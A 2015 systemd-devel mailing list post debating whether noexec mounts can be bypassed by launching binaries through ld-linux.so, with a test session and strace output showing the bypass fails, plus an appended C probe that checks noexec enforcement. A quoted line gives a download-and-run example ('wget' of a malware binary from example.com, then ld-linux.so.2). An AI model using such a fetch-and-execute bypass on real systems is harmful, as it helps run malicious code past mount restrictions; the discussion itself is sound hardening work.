[systemd-devel] Mount options of /var/run/users/<pid>

Mantas Mikulėnas grawity at gmail.com
Mon Feb 16 12:02:09 PST 2015


On Mon, Feb 16, 2015 at 9:40 PM, Reindl Harald <h.reindl at thelounge.net>
wrote:

> On 16.02.2015 at 20:31, Mantas Mikulėnas wrote:
>
>> On Mon, Feb 16, 2015 at 9:16 PM, Simon McVittie
>> <simon.mcvittie at collabora.co.uk> wrote:
>>
>>     wget http://example.com/malware.x86.bin
>>     /lib/ld-linux.so.2 malware.x86.bin
>>
>>
>> Pretty sure this no longer works; these days noexec prevents
>> mmap(PROT_EXEC) as well
>>
>
> you should not assume when you can simply try it
> [...]
> [root at arrakis:~]$ bash /Volumes/dune/test.sh
> config-3.18.7-100.fc20.x86_64  grub2 initramfs-3.18.7-100.fc20.x86_64.img
> initrd-plymouth.img  lost+found System.map-3.18.7-100.fc20.x86_64
> vmlinuz-3.18.7-100.fc20.x86_64
>

And you should not reply before you read the actual post, in which I
specifically reply to a comment about ld-linux.so – not script
interpreters, which don't rely on this function.

# mount | grep /test
/test.img on /mnt/test type ext4 (rw,noexec,relatime,data=ordered)
# cp -a /bin/echo /mnt/test/echo
# chmod a+rx /mnt/test/echo
# /usr/lib/ld-linux-x86-64.so.2 /mnt/test/echo
/mnt/test/echo: error while loading shared libraries: /mnt/test/echo: failed to map segment from shared object
# strace /usr/lib/ld-linux-x86-64.so.2 /mnt/test/echo
open("/mnt/test/echo", O_RDONLY|O_CLOEXEC) = 3
mmap(0x400000, 28672, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0) = -1 EPERM (Operation not permitted)
#

-- 
Mantas Mikulėnas <grawity at gmail.com>
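
Added example (not part of the original message or of systemd): a small C probe that repeats the check visible in the strace output above, so an administrator can confirm that a mount flagged noexec really refuses mmap(PROT_EXEC) on the running kernel. The names `probe_exec_map` and `struct exec_probe`, and the default path /bin/sh, are assumptions made for this example.

```c
#define _GNU_SOURCE  /* glibc exposes ST_NOEXEC only with this */
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <string.h>
#include <sys/mman.h>
#include <sys/statvfs.h>
#include <unistd.h>
#ifndef ST_NOEXEC
#define ST_NOEXEC 8  /* Linux value; used if feature macros were fixed earlier */
#endif

struct exec_probe {          /* hypothetical name, for this example only */
    int noexec;              /* 1 if the file's mount carries the noexec flag */
    int map_errno;           /* 0 if mmap(PROT_EXEC) succeeded, else its errno */
};

/* Returns 0 when the probe ran, -1 if the file could not be opened or statted. */
int probe_exec_map(const char *path, struct exec_probe *out)
{
    struct statvfs vfs;
    int fd = open(path, O_RDONLY | O_CLOEXEC);
    if (fd < 0)
        return -1;
    if (fstatvfs(fd, &vfs) != 0) {
        close(fd);
        return -1;
    }
    out->noexec = (vfs.f_flag & ST_NOEXEC) != 0;
    /* Same protection bits ld.so asks for on a text segment (no MAP_FIXED). */
    void *p = mmap(NULL, 4096, PROT_READ | PROT_EXEC, MAP_PRIVATE, fd, 0);
    out->map_errno = (p == MAP_FAILED) ? errno : 0;
    if (p != MAP_FAILED)
        munmap(p, 4096);
    close(fd);
    return 0;
}

int main(int argc, char **argv)
{
    const char *path = argc > 1 ? argv[1] : "/bin/sh";  /* assumed default */
    struct exec_probe r;
    if (probe_exec_map(path, &r) != 0) {
        perror(path);
        return 2;
    }
    printf("%s: mount noexec=%d, mmap(PROT_EXEC): %s\n", path, r.noexec,
           r.map_errno ? strerror(r.map_errno) : "ok");
    return (r.noexec && r.map_errno == 0) ? 1 : 0;  /* 1 = noexec not enforced */
}
```

Run it against a file on the mount being audited (for instance the /mnt/test/echo copy from the session above); exit status 1 means the mount is flagged noexec but still allowed an executable mapping.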